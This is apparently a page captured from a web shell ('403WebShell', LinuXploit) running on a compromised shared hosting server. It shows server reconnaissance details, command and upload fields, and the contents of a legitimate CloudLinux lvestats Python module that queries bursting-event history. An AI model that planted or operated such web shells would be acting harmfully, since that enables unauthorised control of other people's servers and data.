Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.145.65.133
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/cloudlinux/venv/lib64/python3.11/site-packages/lvestats/lib/bursting/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/cloudlinux/venv/lib64/python3.11/site-packages/lvestats/lib/bursting//history.py
# coding=utf-8
#
# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2023 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT

import datetime

import sqlalchemy as sa

from lvestats.orm import bursting_events_table


class TableDoesNotExistError(Exception):
    """
    Raised when a required table is missing from the database.

    The human-readable text is available both through ``str(exc)``
    and through the ``message`` attribute.
    """

    def __init__(self, table_name):
        """
        :param table_name: name of the missing table, embedded in the message
        """
        message = f'Table "{table_name}" does not exist in the database'
        super().__init__(message)
        self.message = message


class HistoryShowBursting:
    """
    Reads bursting events history from the 'bursting_events' table.

    The selection is limited to one server and one time frame,
    and optionally to a single LVE id.
    """

    def __init__(self,
                 dbengine: sa.engine.base.Engine,
                 period_from: datetime.datetime,
                 period_to: datetime.datetime,
                 uid: int | None = None,
                 server_id: str = 'localhost') -> None:
        """
        :param dbengine: engine used to inspect and query the database
        :param period_from: start of the time frame (inclusive)
        :param period_to: end of the time frame (inclusive)
        :param uid: if not None, only events with this lve_id are returned
        :param server_id: only events of this server are returned
        """
        self.dbengine = dbengine
        self.period_from = period_from
        self.period_to = period_to
        self.uid = uid
        self.server_id = server_id

    def _scope_conditions(self) -> list:
        """
        Build the filters shared by every query on the events table:
        the server id and, when ``self.uid`` is set, the lve_id.
        """
        conditions = [bursting_events_table.c.server_id == self.server_id]
        if self.uid is not None:
            conditions.append(bursting_events_table.c.lve_id == self.uid)
        return conditions

    def get(self) -> list[sa.engine.RowProxy]:
        """
        Get history from the 'bursting_events' table.

        Retrieving records within the required time frame,
        along with one record preceding this time frame
        to detect the bursting status at the start of the time frame.

        :return: rows of (lve_id, timestamp, event_type)
            ordered by lve_id, then by timestamp
        :raises TableDoesNotExistError: if the table is absent from the database
        """
        # Since bursting limits functionality isn't enabled by default,
        # we need to check if the table exists first
        inspector = sa.inspect(self.dbengine)
        if bursting_events_table.name not in inspector.get_table_names():
            raise TableDoesNotExistError(bursting_events_table.name)

        # The table is filtered by numeric timestamps
        ts_from = self.period_from.timestamp()
        ts_to = self.period_to.timestamp()

        columns = [
            bursting_events_table.c.lve_id,
            bursting_events_table.c.timestamp,
            bursting_events_table.c.event_type,
        ]

        # Get the rows with timestamp between ts_from and ts_to
        in_period = sa.select(columns).where(
            sa.and_(
                *self._scope_conditions(),
                bursting_events_table.c.timestamp >= ts_from,
                bursting_events_table.c.timestamp <= ts_to,
            )
        )

        # Subquery to get the maximum timestamp for each lve_id where timestamp < ts_from
        latest_before = sa.select([
            bursting_events_table.c.lve_id,
            sa.func.max(bursting_events_table.c.timestamp).label('max_timestamp'),
        ]).where(
            sa.and_(
                *self._scope_conditions(),
                bursting_events_table.c.timestamp < ts_from,
            )
        ).group_by(
            bursting_events_table.c.lve_id,
        ).alias('subquery')

        # Get the row with the maximum timestamp less than ts_from
        before_period = sa.select(columns).select_from(
            bursting_events_table.join(
                latest_before,
                sa.and_(
                    bursting_events_table.c.lve_id == latest_before.c.lve_id,
                    bursting_events_table.c.timestamp == latest_before.c.max_timestamp,
                )
            )
        ).where(
            # The join matches on (lve_id, timestamp) only, so the server
            # filter has to be repeated here: otherwise an event of another
            # server sharing the same pair would leak into the result.
            bursting_events_table.c.server_id == self.server_id,
        )

        stmt = sa.union(
            in_period,
            before_period,
        )

        stmt = stmt.order_by(
            stmt.c.lve_id,
            stmt.c.timestamp,
        )

        with self.dbengine.connect() as connection:
            result = connection.execute(stmt).fetchall()
        return result

Youez - 2016 - github.com/yon3zu
LinuXploit